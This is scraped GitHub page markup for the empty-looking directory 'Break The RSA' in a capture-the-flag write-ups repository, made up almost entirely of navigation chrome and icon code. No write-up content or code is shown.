<div aria-hidden="true" class="border rounded-1 flex-shrink-0 color-bg-tertiary px-1 color-text-tertiary ml-1 f6 d-none d-on-nav-focus js-jump-to-badge-jump"> Jump to <span>↵</span> </div>
<span>No suggested jump to results</span>
<div class="jump-to-octicon js-jump-to-octicon flex-shrink-0 mr-2 text-center d-none"> <svg title="Repository" aria-label="Repository" role="img" height="16" viewBox="0 0 16 16" version="1.1" width="16" data-view-component="true" class="octicon octicon-repo js-jump-to-octicon-repo d-none flex-shrink-0"> <path fill-rule="evenodd" d="M2 2.5A2.5 2.5 0 014.5 0h8.75a.75.75 0 01.75.75v12.5a.75.75 0 01-.75.75h-2.5a.75.75 0 110-1.5h1.75v-2h-8a1 1 0 00-.714 1.7.75.75 0 01-1.072 1.05A2.495 2.495 0 012 11.5v-9zm10.5-1V9h-8c-.356 0-.694.074-1 .208V2.5a1 1 0 011-1h8zM5 12.25v3.25a.25.25 0 00.4.2l1.45-1.087a.25.25 0 01.3 0L8.6 15.7a.25.25 0 00.4-.2v-3.25a.25.25 0 00-.25-.25h-3.5a.25.25 0 00-.25.25z"></path></svg> <svg title="Project" aria-label="Project" role="img" height="16" viewBox="0 0 16 16" version="1.1" width="16" data-view-component="true" class="octicon octicon-project js-jump-to-octicon-project d-none flex-shrink-0"> <path fill-rule="evenodd" d="M1.75 0A1.75 1.75 0 000 1.75v12.5C0 15.216.784 16 1.75 16h12.5A1.75 1.75 0 0016 14.25V1.75A1.75 1.75 0 0014.25 0H1.75zM1.5 1.75a.25.25 0 01.25-.25h12.5a.25.25 0 01.25.25v12.5a.25.25 0 01-.25.25H1.75a.25.25 0 01-.25-.25V1.75zM11.75 3a.75.75 0 00-.75.75v7.5a.75.75 0 001.5 0v-7.5a.75.75 0 00-.75-.75zm-8.25.75a.75.75 0 011.5 0v5.5a.75.75 0 01-1.5 0v-5.5zM8 3a.75.75 0 00-.75.75v3.5a.75.75 0 001.5 0v-3.5A.75.75 0 008 3z"></path></svg> <svg title="Search" aria-label="Search" role="img" height="16" viewBox="0 0 16 16" version="1.1" width="16" data-view-component="true" class="octicon octicon-search js-jump-to-octicon-search d-none flex-shrink-0"> <path fill-rule="evenodd" d="M11.5 7a4.499 4.499 0 11-8.998 0A4.499 4.499 0 0111.5 7zm-.82 4.74a6 6 0 111.06-1.06l3.04 3.04a.75.75 0 11-1.06 1.06l-3.04-3.04z"></path></svg> </div>
<div class="jump-to-suggestion-name js-jump-to-suggestion-name flex-auto overflow-hidden text-left no-wrap css-truncate css-truncate-target"> </div>
<div class="border rounded-1 flex-shrink-0 color-bg-tertiary px-1 color-text-tertiary ml-1 f6 d-none js-jump-to-badge-search"> <span> In this repository </span> <span> All GitHub </span> <span>↵</span> </div>
<div aria-hidden="true" class="border rounded-1 flex-shrink-0 color-bg-tertiary px-1 color-text-tertiary ml-1 f6 d-none d-on-nav-focus js-jump-to-badge-jump"> Jump to <span>↵</span> </div>
<div class="jump-to-octicon js-jump-to-octicon flex-shrink-0 mr-2 text-center d-none"> <svg title="Repository" aria-label="Repository" role="img" height="16" viewBox="0 0 16 16" version="1.1" width="16" data-view-component="true" class="octicon octicon-repo js-jump-to-octicon-repo d-none flex-shrink-0"> <path fill-rule="evenodd" d="M2 2.5A2.5 2.5 0 014.5 0h8.75a.75.75 0 01.75.75v12.5a.75.75 0 01-.75.75h-2.5a.75.75 0 110-1.5h1.75v-2h-8a1 1 0 00-.714 1.7.75.75 0 01-1.072 1.05A2.495 2.495 0 012 11.5v-9zm10.5-1V9h-8c-.356 0-.694.074-1 .208V2.5a1 1 0 011-1h8zM5 12.25v3.25a.25.25 0 00.4.2l1.45-1.087a.25.25 0 01.3 0L8.6 15.7a.25.25 0 00.4-.2v-3.25a.25.25 0 00-.25-.25h-3.5a.25.25 0 00-.25.25z"></path></svg> <svg title="Project" aria-label="Project" role="img" height="16" viewBox="0 0 16 16" version="1.1" width="16" data-view-component="true" class="octicon octicon-project js-jump-to-octicon-project d-none flex-shrink-0"> <path fill-rule="evenodd" d="M1.75 0A1.75 1.75 0 000 1.75v12.5C0 15.216.784 16 1.75 16h12.5A1.75 1.75 0 0016 14.25V1.75A1.75 1.75 0 0014.25 0H1.75zM1.5 1.75a.25.25 0 01.25-.25h12.5a.25.25 0 01.25.25v12.5a.25.25 0 01-.25.25H1.75a.25.25 0 01-.25-.25V1.75zM11.75 3a.75.75 0 00-.75.75v7.5a.75.75 0 001.5 0v-7.5a.75.75 0 00-.75-.75zm-8.25.75a.75.75 0 011.5 0v5.5a.75.75 0 01-1.5 0v-5.5zM8 3a.75.75 0 00-.75.75v3.5a.75.75 0 001.5 0v-3.5A.75.75 0 008 3z"></path></svg> <svg title="Search" aria-label="Search" role="img" height="16" viewBox="0 0 16 16" version="1.1" width="16" data-view-component="true" class="octicon octicon-search js-jump-to-octicon-search d-none flex-shrink-0"> <path fill-rule="evenodd" d="M11.5 7a4.499 4.499 0 11-8.998 0A4.499 4.499 0 0111.5 7zm-.82 4.74a6 6 0 111.06-1.06l3.04 3.04a.75.75 0 11-1.06 1.06l-3.04-3.04z"></path></svg> </div>
<div class="jump-to-suggestion-name js-jump-to-suggestion-name flex-auto overflow-hidden text-left no-wrap css-truncate css-truncate-target"> </div>
<div class="border rounded-1 flex-shrink-0 color-bg-tertiary px-1 color-text-tertiary ml-1 f6 d-none js-jump-to-badge-search"> <span> In this user </span> <span> All GitHub </span> <span>↵</span> </div>
<div aria-hidden="true" class="border rounded-1 flex-shrink-0 color-bg-tertiary px-1 color-text-tertiary ml-1 f6 d-none d-on-nav-focus js-jump-to-badge-jump"> Jump to <span>↵</span> </div>
<div class="jump-to-octicon js-jump-to-octicon flex-shrink-0 mr-2 text-center d-none"> <svg title="Repository" aria-label="Repository" role="img" height="16" viewBox="0 0 16 16" version="1.1" width="16" data-view-component="true" class="octicon octicon-repo js-jump-to-octicon-repo d-none flex-shrink-0"> <path fill-rule="evenodd" d="M2 2.5A2.5 2.5 0 014.5 0h8.75a.75.75 0 01.75.75v12.5a.75.75 0 01-.75.75h-2.5a.75.75 0 110-1.5h1.75v-2h-8a1 1 0 00-.714 1.7.75.75 0 01-1.072 1.05A2.495 2.495 0 012 11.5v-9zm10.5-1V9h-8c-.356 0-.694.074-1 .208V2.5a1 1 0 011-1h8zM5 12.25v3.25a.25.25 0 00.4.2l1.45-1.087a.25.25 0 01.3 0L8.6 15.7a.25.25 0 00.4-.2v-3.25a.25.25 0 00-.25-.25h-3.5a.25.25 0 00-.25.25z"></path></svg> <svg title="Project" aria-label="Project" role="img" height="16" viewBox="0 0 16 16" version="1.1" width="16" data-view-component="true" class="octicon octicon-project js-jump-to-octicon-project d-none flex-shrink-0"> <path fill-rule="evenodd" d="M1.75 0A1.75 1.75 0 000 1.75v12.5C0 15.216.784 16 1.75 16h12.5A1.75 1.75 0 0016 14.25V1.75A1.75 1.75 0 0014.25 0H1.75zM1.5 1.75a.25.25 0 01.25-.25h12.5a.25.25 0 01.25.25v12.5a.25.25 0 01-.25.25H1.75a.25.25 0 01-.25-.25V1.75zM11.75 3a.75.75 0 00-.75.75v7.5a.75.75 0 001.5 0v-7.5a.75.75 0 00-.75-.75zm-8.25.75a.75.75 0 011.5 0v5.5a.75.75 0 01-1.5 0v-5.5zM8 3a.75.75 0 00-.75.75v3.5a.75.75 0 001.5 0v-3.5A.75.75 0 008 3z"></path></svg> <svg title="Search" aria-label="Search" role="img" height="16" viewBox="0 0 16 16" version="1.1" width="16" data-view-component="true" class="octicon octicon-search js-jump-to-octicon-search d-none flex-shrink-0"> <path fill-rule="evenodd" d="M11.5 7a4.499 4.499 0 11-8.998 0A4.499 4.499 0 0111.5 7zm-.82 4.74a6 6 0 111.06-1.06l3.04 3.04a.75.75 0 11-1.06 1.06l-3.04-3.04z"></path></svg> </div>
<div class="jump-to-suggestion-name js-jump-to-suggestion-name flex-auto overflow-hidden text-left no-wrap css-truncate css-truncate-target"> </div>
<div class="border rounded-1 flex-shrink-0 color-bg-tertiary px-1 color-text-tertiary ml-1 f6 d-none js-jump-to-badge-search"> <span> In this repository </span> <span> All GitHub </span> <span>↵</span> </div>
<div aria-hidden="true" class="border rounded-1 flex-shrink-0 color-bg-tertiary px-1 color-text-tertiary ml-1 f6 d-none d-on-nav-focus js-jump-to-badge-jump"> Jump to <span>↵</span> </div>
</div> </label></form> </div></div>
</div>
<div class="position-relative mr-3 mb-4 mb-lg-0 d-inline-block"> Sign in </div>
Sign up </div> </div> </div></header>
</div>
<div id="start-of-content" class="show-on-focus"></div>
<div data-pjax-replace id="js-flash-container">
<template class="js-flash-template"> <div class="flash flash-full {{ className }}"> <div class=" px-2" > <button class="flash-close js-flash-close" type="button" aria-label="Dismiss this message"> <svg aria-hidden="true" height="16" viewBox="0 0 16 16" version="1.1" width="16" data-view-component="true" class="octicon octicon-x"> <path fill-rule="evenodd" d="M3.72 3.72a.75.75 0 011.06 0L8 6.94l3.22-3.22a.75.75 0 111.06 1.06L9.06 8l3.22 3.22a.75.75 0 11-1.06 1.06L8 9.06l-3.22 3.22a.75.75 0 01-1.06-1.06L6.94 8 3.72 4.78a.75.75 0 010-1.06z"></path></svg> </button> <div>{{ message }}</div>
</div></div> </template></div>
<include-fragment class="js-notification-shelf-include-fragment" data-base-src="https://github.com/notifications/beta/shelf"></include-fragment>
<div class="application-main " data-commit-hovercards-enabled data-discussion-hovercards-enabled data-issue-and-pr-hovercards-enabled > <div itemscope itemtype="http://schema.org/SoftwareSourceCode" class=""> <main id="js-repo-pjax-container" data-pjax-container >
<div id="repository-container-header" class="pt-3 hide-full-screen mb-5" style="background-color: var(--color-page-header-bg);" data-pjax-replace>
<div class="d-flex mb-3 px-3 px-md-4 px-lg-5">
<div class="flex-auto min-width-0 width-fit mr-3"> <h1 class=" d-flex flex-wrap flex-items-center wb-break-word f3 text-normal"> <svg aria-hidden="true" height="16" viewBox="0 0 16 16" version="1.1" width="16" data-view-component="true" class="octicon octicon-repo color-icon-secondary mr-2"> <path fill-rule="evenodd" d="M2 2.5A2.5 2.5 0 014.5 0h8.75a.75.75 0 01.75.75v12.5a.75.75 0 01-.75.75h-2.5a.75.75 0 110-1.5h1.75v-2h-8a1 1 0 00-.714 1.7.75.75 0 01-1.072 1.05A2.495 2.495 0 012 11.5v-9zm10.5-1V9h-8c-.356 0-.694.074-1 .208V2.5a1 1 0 011-1h8zM5 12.25v3.25a.25.25 0 00.4.2l1.45-1.087a.25.25 0 01.3 0L8.6 15.7a.25.25 0 00.4-.2v-3.25a.25.25 0 00-.25-.25h-3.5a.25.25 0 00-.25.25z"></path></svg> <span> 0xM4hm0ud </span> <span>/</span> CTF-Writeups
<span></span><span>Public</span></h1>
</div>
<svg aria-hidden="true" height="16" viewBox="0 0 16 16" version="1.1" width="16" data-view-component="true" class="octicon octicon-bell"> <path d="M8 16a2 2 0 001.985-1.75c.017-.137-.097-.25-.235-.25h-3.5c-.138 0-.252.113-.235.25A2 2 0 008 16z"></path><path fill-rule="evenodd" d="M8 1.5A3.5 3.5 0 004.5 5v2.947c0 .346-.102.683-.294.97l-1.703 2.556a.018.018 0 00-.003.01l.001.006c0 .002.002.004.004.006a.017.017 0 00.006.004l.007.001h10.964l.007-.001a.016.016 0 00.006-.004.016.016 0 00.004-.006l.001-.007a.017.017 0 00-.003-.01l-1.703-2.554a1.75 1.75 0 01-.294-.97V5A3.5 3.5 0 008 1.5zM3 5a5 5 0 0110 0v2.947c0 .05.015.098.042.139l1.703 2.555A1.518 1.518 0 0113.482 13H2.518a1.518 1.518 0 01-1.263-2.36l1.703-2.554A.25.25 0 003 7.947V5z"></path></svg> Notifications
<div > <svg aria-hidden="true" height="16" viewBox="0 0 16 16" version="1.1" width="16" data-view-component="true" class="octicon octicon-star v-align-text-bottom mr-1"> <path fill-rule="evenodd" d="M8 .25a.75.75 0 01.673.418l1.882 3.815 4.21.612a.75.75 0 01.416 1.279l-3.046 2.97.719 4.192a.75.75 0 01-1.088.791L8 12.347l-3.766 1.98a.75.75 0 01-1.088-.79l.72-4.194L.818 6.374a.75.75 0 01.416-1.28l4.21-.611L7.327.668A.75.75 0 018 .25zm0 2.445L6.615 5.5a.75.75 0 01-.564.41l-3.097.45 2.24 2.184a.75.75 0 01.216.664l-.528 3.084 2.769-1.456a.75.75 0 01.698 0l2.77 1.456-.53-3.084a.75.75 0 01.216-.664l2.24-2.183-3.096-.45a.75.75 0 01-.564-.41L8 2.694v.001z"></path></svg> <span> Star</span>
3 </div>
<svg aria-hidden="true" height="16" viewBox="0 0 16 16" version="1.1" width="16" data-view-component="true" class="octicon octicon-repo-forked"> <path fill-rule="evenodd" d="M5 3.25a.75.75 0 11-1.5 0 .75.75 0 011.5 0zm0 2.122a2.25 2.25 0 10-1.5 0v.878A2.25 2.25 0 005.75 8.5h1.5v2.128a2.251 2.251 0 101.5 0V8.5h1.5a2.25 2.25 0 002.25-2.25v-.878a2.25 2.25 0 10-1.5 0v.878a.75.75 0 01-.75.75h-4.5A.75.75 0 015 6.25v-.878zm3.75 7.378a.75.75 0 11-1.5 0 .75.75 0 011.5 0zm3-8.75a.75.75 0 100-1.5.75.75 0 000 1.5z"></path></svg> Fork
0
</div>
<div id="responsive-meta-container" data-pjax-replace></div>
<nav data-pjax="#js-repo-pjax-container" aria-label="Repository" data-view-component="true" class="js-repo-nav js-sidenav-container-pjax js-responsive-underlinenav overflow-hidden UnderlineNav px-3 px-md-4 px-lg-5">
<svg aria-hidden="true" height="16" viewBox="0 0 16 16" version="1.1" width="16" data-view-component="true" class="octicon octicon-code UnderlineNav-octicon d-none d-sm-inline"> <path fill-rule="evenodd" d="M4.72 3.22a.75.75 0 011.06 1.06L2.06 8l3.72 3.72a.75.75 0 11-1.06 1.06L.47 8.53a.75.75 0 010-1.06l4.25-4.25zm6.56 0a.75.75 0 10-1.06 1.06L13.94 8l-3.72 3.72a.75.75 0 101.06 1.06l4.25-4.25a.75.75 0 000-1.06l-4.25-4.25z"></path></svg> <span>Code</span> <span></span>
<svg aria-hidden="true" height="16" viewBox="0 0 16 16" version="1.1" width="16" data-view-component="true" class="octicon octicon-issue-opened UnderlineNav-octicon d-none d-sm-inline"> <path d="M8 9.5a1.5 1.5 0 100-3 1.5 1.5 0 000 3z"></path><path fill-rule="evenodd" d="M8 0a8 8 0 100 16A8 8 0 008 0zM1.5 8a6.5 6.5 0 1113 0 6.5 6.5 0 01-13 0z"></path></svg> <span>Issues</span> <span>0</span>
<svg aria-hidden="true" height="16" viewBox="0 0 16 16" version="1.1" width="16" data-view-component="true" class="octicon octicon-git-pull-request UnderlineNav-octicon d-none d-sm-inline"> <path fill-rule="evenodd" d="M7.177 3.073L9.573.677A.25.25 0 0110 .854v4.792a.25.25 0 01-.427.177L7.177 3.427a.25.25 0 010-.354zM3.75 2.5a.75.75 0 100 1.5.75.75 0 000-1.5zm-2.25.75a2.25 2.25 0 113 2.122v5.256a2.251 2.251 0 11-1.5 0V5.372A2.25 2.25 0 011.5 3.25zM11 2.5h-1V4h1a1 1 0 011 1v5.628a2.251 2.251 0 101.5 0V5A2.5 2.5 0 0011 2.5zm1 10.25a.75.75 0 111.5 0 .75.75 0 01-1.5 0zM3.75 12a.75.75 0 100 1.5.75.75 0 000-1.5z"></path></svg> <span>Pull requests</span> <span>0</span>
<svg aria-hidden="true" height="16" viewBox="0 0 16 16" version="1.1" width="16" data-view-component="true" class="octicon octicon-play UnderlineNav-octicon d-none d-sm-inline"> <path fill-rule="evenodd" d="M1.5 8a6.5 6.5 0 1113 0 6.5 6.5 0 01-13 0zM8 0a8 8 0 100 16A8 8 0 008 0zM6.379 5.227A.25.25 0 006 5.442v5.117a.25.25 0 00.379.214l4.264-2.559a.25.25 0 000-.428L6.379 5.227z"></path></svg> <span>Actions</span> <span></span>
<svg aria-hidden="true" height="16" viewBox="0 0 16 16" version="1.1" width="16" data-view-component="true" class="octicon octicon-project UnderlineNav-octicon d-none d-sm-inline"> <path fill-rule="evenodd" d="M1.75 0A1.75 1.75 0 000 1.75v12.5C0 15.216.784 16 1.75 16h12.5A1.75 1.75 0 0016 14.25V1.75A1.75 1.75 0 0014.25 0H1.75zM1.5 1.75a.25.25 0 01.25-.25h12.5a.25.25 0 01.25.25v12.5a.25.25 0 01-.25.25H1.75a.25.25 0 01-.25-.25V1.75zM11.75 3a.75.75 0 00-.75.75v7.5a.75.75 0 001.5 0v-7.5a.75.75 0 00-.75-.75zm-8.25.75a.75.75 0 011.5 0v5.5a.75.75 0 01-1.5 0v-5.5zM8 3a.75.75 0 00-.75.75v3.5a.75.75 0 001.5 0v-3.5A.75.75 0 008 3z"></path></svg> <span>Projects</span> <span>0</span>
<svg aria-hidden="true" height="16" viewBox="0 0 16 16" version="1.1" width="16" data-view-component="true" class="octicon octicon-book UnderlineNav-octicon d-none d-sm-inline"> <path fill-rule="evenodd" d="M0 1.75A.75.75 0 01.75 1h4.253c1.227 0 2.317.59 3 1.501A3.744 3.744 0 0111.006 1h4.245a.75.75 0 01.75.75v10.5a.75.75 0 01-.75.75h-4.507a2.25 2.25 0 00-1.591.659l-.622.621a.75.75 0 01-1.06 0l-.622-.621A2.25 2.25 0 005.258 13H.75a.75.75 0 01-.75-.75V1.75zm8.755 3a2.25 2.25 0 012.25-2.25H14.5v9h-3.757c-.71 0-1.4.201-1.992.572l.004-7.322zm-1.504 7.324l.004-5.073-.002-2.253A2.25 2.25 0 005.003 2.5H1.5v9h3.757a3.75 3.75 0 011.994.574z"></path></svg> <span>Wiki</span> <span></span>
<svg aria-hidden="true" height="16" viewBox="0 0 16 16" version="1.1" width="16" data-view-component="true" class="octicon octicon-shield UnderlineNav-octicon d-none d-sm-inline"> <path fill-rule="evenodd" d="M7.467.133a1.75 1.75 0 011.066 0l5.25 1.68A1.75 1.75 0 0115 3.48V7c0 1.566-.32 3.182-1.303 4.682-.983 1.498-2.585 2.813-5.032 3.855a1.7 1.7 0 01-1.33 0c-2.447-1.042-4.049-2.357-5.032-3.855C1.32 10.182 1 8.566 1 7V3.48a1.75 1.75 0 011.217-1.667l5.25-1.68zm.61 1.429a.25.25 0 00-.153 0l-5.25 1.68a.25.25 0 00-.174.238V7c0 1.358.275 2.666 1.057 3.86.784 1.194 2.121 2.34 4.366 3.297a.2.2 0 00.154 0c2.245-.956 3.582-2.104 4.366-3.298C13.225 9.666 13.5 8.36 13.5 7V3.48a.25.25 0 00-.174-.237l-5.25-1.68zM9 10.5a1 1 0 11-2 0 1 1 0 012 0zm-.25-5.75a.75.75 0 10-1.5 0v3a.75.75 0 001.5 0v-3z"></path></svg> <span>Security</span> <include-fragment src="/0xM4hm0ud/CTF-Writeups/security/overall-count" accept="text/fragment+html"></include-fragment>
<svg aria-hidden="true" height="16" viewBox="0 0 16 16" version="1.1" width="16" data-view-component="true" class="octicon octicon-graph UnderlineNav-octicon d-none d-sm-inline"> <path fill-rule="evenodd" d="M1.5 1.75a.75.75 0 00-1.5 0v12.5c0 .414.336.75.75.75h14.5a.75.75 0 000-1.5H1.5V1.75zm14.28 2.53a.75.75 0 00-1.06-1.06L10 7.94 7.53 5.47a.75.75 0 00-1.06 0L3.22 8.72a.75.75 0 001.06 1.06L7 7.06l2.47 2.47a.75.75 0 001.06 0l5.25-5.25z"></path></svg> <span>Insights</span> <span></span>
<div style="visibility:hidden;" data-view-component="true" class="UnderlineNav-actions js-responsive-underlinenav-overflow position-absolute pr-3 pr-md-4 pr-lg-5 right-0"> <details data-view-component="true" class="details-overlay details-reset position-relative"> <summary role="button" data-view-component="true"> <div class="UnderlineNav-item mr-0 border-0"> <svg aria-hidden="true" height="16" viewBox="0 0 16 16" version="1.1" width="16" data-view-component="true" class="octicon octicon-kebab-horizontal"> <path d="M8 9a1.5 1.5 0 100-3 1.5 1.5 0 000 3zM1.5 9a1.5 1.5 0 100-3 1.5 1.5 0 000 3zm13 0a1.5 1.5 0 100-3 1.5 1.5 0 000 3z"></path></svg> <span>More</span> </div></summary> <div data-view-component="true"> <details-menu role="menu" data-view-component="true" class="dropdown-menu dropdown-menu-sw"> Code Issues Pull requests Actions Projects Wiki Security Insights
</details-menu></div></details></div></nav> </div>
<div class="clearfix new-discussion-timeline container-xl px-3 px-md-4 px-lg-5"> <div id="repo-content-pjax-container" class="repository-content " >
<div> <div class="file-navigation mb-3 d-flex flex-items-start"> <div class="position-relative"> <details class="details-reset details-overlay mr-0 mb-0 " id="branch-select-menu"> <summary class="btn css-truncate" data-hotkey="w" title="Switch branches or tags"> <svg aria-hidden="true" height="16" viewBox="0 0 16 16" version="1.1" width="16" data-view-component="true" class="octicon octicon-git-branch"> <path fill-rule="evenodd" d="M11.75 2.5a.75.75 0 100 1.5.75.75 0 000-1.5zm-2.25.75a2.25 2.25 0 113 2.122V6A2.5 2.5 0 0110 8.5H6a1 1 0 00-1 1v1.128a2.251 2.251 0 11-1.5 0V5.372a2.25 2.25 0 111.5 0v1.836A2.492 2.492 0 016 7h4a1 1 0 001-1v-.628A2.25 2.25 0 019.5 3.25zM4.25 12a.75.75 0 100 1.5.75.75 0 000-1.5zM3.5 3.25a.75.75 0 111.5 0 .75.75 0 01-1.5 0z"></path></svg> <span>main</span> <span></span> </summary>
<div class="SelectMenu"> <div class="SelectMenu-modal"> <header class="SelectMenu-header"> <span>Switch branches/tags</span> <button class="SelectMenu-closeButton" type="button" data-toggle-for="branch-select-menu"><svg aria-label="Close menu" aria-hidden="false" role="img" height="16" viewBox="0 0 16 16" version="1.1" width="16" data-view-component="true" class="octicon octicon-x"> <path fill-rule="evenodd" d="M3.72 3.72a.75.75 0 011.06 0L8 6.94l3.22-3.22a.75.75 0 111.06 1.06L9.06 8l3.22 3.22a.75.75 0 11-1.06 1.06L8 9.06l-3.22 3.22a.75.75 0 01-1.06-1.06L6.94 8 3.72 4.78a.75.75 0 010-1.06z"></path></svg></button> </header>
<input-demux data-action="tab-container-change:input-demux#storeInput tab-container-changed:input-demux#updateInput"> <tab-container class="d-flex flex-column js-branches-tags-tabs" style="min-height: 0;"> <div class="SelectMenu-filter"> <input data-target="input-demux.source" id="context-commitish-filter-field" class="SelectMenu-input form-control" aria-owns="ref-list-branches" data-controls-ref-menu-id="ref-list-branches" autofocus autocomplete="off" aria-label="Filter branches/tags" placeholder="Filter branches/tags" type="text" > </div>
<div class="SelectMenu-tabs" role="tablist" data-target="input-demux.control" > <button class="SelectMenu-tab" type="button" role="tab" aria-selected="true">Branches</button> <button class="SelectMenu-tab" type="button" role="tab">Tags</button> </div>
<div role="tabpanel" id="ref-list-branches" data-filter-placeholder="Filter branches/tags" class="d-flex flex-column flex-auto overflow-auto" tabindex=""> <ref-selector type="branch" data-targets="input-demux.sinks" data-action=" input-entered:ref-selector#inputEntered tab-selected:ref-selector#tabSelected focus-list:ref-selector#focusFirstListMember " query-endpoint="/0xM4hm0ud/CTF-Writeups/refs" cache-key="v0:1629839176.279113" current-committish="bWFpbg==" default-branch="bWFpbg==" name-with-owner="MHhNNGhtMHVkL0NURi1Xcml0ZXVwcw==" prefetch-on-mouseover >
<template data-target="ref-selector.fetchFailedTemplate"> <div class="SelectMenu-message" data-index="{{ index }}">Could not load branches</div> </template>
<template data-target="ref-selector.noMatchTemplate"> <div class="SelectMenu-message">Nothing to show</div></template>
<div data-target="ref-selector.listContainer" role="menu" class="SelectMenu-list " style="max-height: 330px" data-pjax="#repo-content-pjax-container"> <div class="SelectMenu-loading pt-3 pb-0" aria-label="Menu is loading"> <svg style="box-sizing: content-box; color: var(--color-icon-primary);" width="32" height="32" viewBox="0 0 16 16" fill="none" data-view-component="true" class="anim-rotate"> <circle cx="8" cy="8" r="7" stroke="currentColor" stroke-opacity="0.25" stroke-width="2" vector-effect="non-scaling-stroke" /> <path d="M15 8a7.002 7.002 0 00-7-7" stroke="currentColor" stroke-width="2" stroke-linecap="round" vector-effect="non-scaling-stroke" /></svg> </div> </div>
<template data-target="ref-selector.itemTemplate"> <svg aria-hidden="true" height="16" viewBox="0 0 16 16" version="1.1" width="16" data-view-component="true" class="octicon octicon-check SelectMenu-icon SelectMenu-icon--check"> <path fill-rule="evenodd" d="M13.78 4.22a.75.75 0 010 1.06l-7.25 7.25a.75.75 0 01-1.06 0L2.22 9.28a.75.75 0 011.06-1.06L6 10.94l6.72-6.72a.75.75 0 011.06 0z"></path></svg> <span>{{ refName }}</span> <span>default</span> </template>
<footer class="SelectMenu-footer">View all branches</footer> </ref-selector>
</div>
<div role="tabpanel" id="tags-menu" data-filter-placeholder="Find a tag" class="d-flex flex-column flex-auto overflow-auto" tabindex="" hidden> <ref-selector type="tag" data-action=" input-entered:ref-selector#inputEntered tab-selected:ref-selector#tabSelected focus-list:ref-selector#focusFirstListMember " data-targets="input-demux.sinks" query-endpoint="/0xM4hm0ud/CTF-Writeups/refs" cache-key="v0:1629839176.279113" current-committish="bWFpbg==" default-branch="bWFpbg==" name-with-owner="MHhNNGhtMHVkL0NURi1Xcml0ZXVwcw==" >
<template data-target="ref-selector.fetchFailedTemplate"> <div class="SelectMenu-message" data-index="{{ index }}">Could not load tags</div> </template>
<template data-target="ref-selector.noMatchTemplate"> <div class="SelectMenu-message" data-index="{{ index }}">Nothing to show</div> </template>
<template data-target="ref-selector.itemTemplate"> <svg aria-hidden="true" height="16" viewBox="0 0 16 16" version="1.1" width="16" data-view-component="true" class="octicon octicon-check SelectMenu-icon SelectMenu-icon--check"> <path fill-rule="evenodd" d="M13.78 4.22a.75.75 0 010 1.06l-7.25 7.25a.75.75 0 01-1.06 0L2.22 9.28a.75.75 0 011.06-1.06L6 10.94l6.72-6.72a.75.75 0 011.06 0z"></path></svg> <span>{{ refName }}</span> <span>default</span> </template>
<div data-target="ref-selector.listContainer" role="menu" class="SelectMenu-list" style="max-height: 330px" data-pjax="#repo-content-pjax-container"> <div class="SelectMenu-loading pt-3 pb-0" aria-label="Menu is loading"> <svg style="box-sizing: content-box; color: var(--color-icon-primary);" width="32" height="32" viewBox="0 0 16 16" fill="none" data-view-component="true" class="anim-rotate"> <circle cx="8" cy="8" r="7" stroke="currentColor" stroke-opacity="0.25" stroke-width="2" vector-effect="non-scaling-stroke" /> <path d="M15 8a7.002 7.002 0 00-7-7" stroke="currentColor" stroke-width="2" stroke-linecap="round" vector-effect="non-scaling-stroke" /></svg> </div> </div> <footer class="SelectMenu-footer">View all tags</footer> </ref-selector> </div> </tab-container> </input-demux> </div></div>
</details>
</div>
<div class="flex-1 mx-2 flex-self-center f4"> <div class="d-none d-sm-block"> <span><span><span>CTF-Writeups</span></span></span><span>/</span><span><span>TamilCTF</span></span><span>/</span><span><span>Crypto</span></span><span>/</span>Break The RSA<span>/</span> </div> </div>
<div class="d-flex"> Go to file </div> </div>
<div class="f4 mt-3 mb-3 d-sm-none"><span><span><span>CTF-Writeups</span></span></span><span>/</span><span><span>TamilCTF</span></span><span>/</span><span><span>Crypto</span></span><span>/</span>Break The RSA<span>/</span></div>
<div class="Box mb-3"> <div class="Box-header position-relative"> <h2 class="sr-only">Latest commit</h2> <div class="js-details-container Details d-flex rounded-top-1 flex-items-center flex-wrap" data-issue-and-pr-hovercards-enabled> <include-fragment src="/0xM4hm0ud/CTF-Writeups/tree-commit/5faa6be3bf621dedae87b3ed4df6a094896d7b42/TamilCTF/Crypto/Break%20The%20RSA" class="d-flex flex-auto flex-items-center" aria-busy="true" aria-label="Loading latest commit"> <div class="Skeleton avatar avatar-user flex-shrink-0 ml-n1 mr-n1 mt-n1 mb-n1" style="width:24px;height:24px;"></div> <div class="Skeleton Skeleton--text col-5 ml-3"> </div></include-fragment> <div class="flex-shrink-0"> <h2 class="sr-only">Git stats</h2> <svg aria-hidden="true" height="16" viewBox="0 0 16 16" version="1.1" width="16" data-view-component="true" class="octicon octicon-history"> <path fill-rule="evenodd" d="M1.643 3.143L.427 1.927A.25.25 0 000 2.104V5.75c0 .138.112.25.25.25h3.646a.25.25 0 00.177-.427L2.715 4.215a6.5 6.5 0 11-1.18 4.458.75.75 0 10-1.493.154 8.001 8.001 0 101.6-5.684zM7.75 4a.75.75 0 01.75.75v2.992l2.028.812a.75.75 0 01-.557 1.392l-2.5-1A.75.75 0 017 8.25v-3.5A.75.75 0 017.75 4z"></path></svg> <span> History </span> </div> </div> </div> <h2 id="files" class="sr-only">Files</h2>
<include-fragment src="/0xM4hm0ud/CTF-Writeups/file-list/main/TamilCTF/Crypto/Break%20The%20RSA"> Permalink
<div data-view-component="true" class="include-fragment-error flash flash-error flash-full py-2"> <svg aria-hidden="true" height="16" viewBox="0 0 16 16" version="1.1" width="16" data-view-component="true" class="octicon octicon-alert"> <path fill-rule="evenodd" d="M8.22 1.754a.25.25 0 00-.44 0L1.698 13.132a.25.25 0 00.22.368h12.164a.25.25 0 00.22-.368L8.22 1.754zm-1.763-.707c.659-1.234 2.427-1.234 3.086 0l6.082 11.378A1.75 1.75 0 0114.082 15H1.918a1.75 1.75 0 01-1.543-2.575L6.457 1.047zM9 11a1 1 0 11-2 0 1 1 0 012 0zm-.25-5.25a.75.75 0 00-1.5 0v2.5a.75.75 0 001.5 0v-2.5z"></path></svg> Failed to load latest commit information.
</div> <div class="js-details-container Details"> <div role="grid" aria-labelledby="files" class="Details-content--hidden-not-important js-navigation-container js-active-navigation-container d-block" data-pjax> <div class="sr-only" role="row"> <div role="columnheader">Type</div> <div role="columnheader">Name</div> <div role="columnheader" class="d-none d-md-block">Latest commit message</div> <div role="columnheader">Commit time</div> </div> <div role="row" class="Box-row Box-row--focus-gray p-0 d-flex js-navigation-item" > <div role="rowheader" class="flex-auto min-width-0 col-md-2"> <span>. .</span> </div> <div role="gridcell" class="d-none d-md-block"></div> <div role="gridcell"></div> </div>
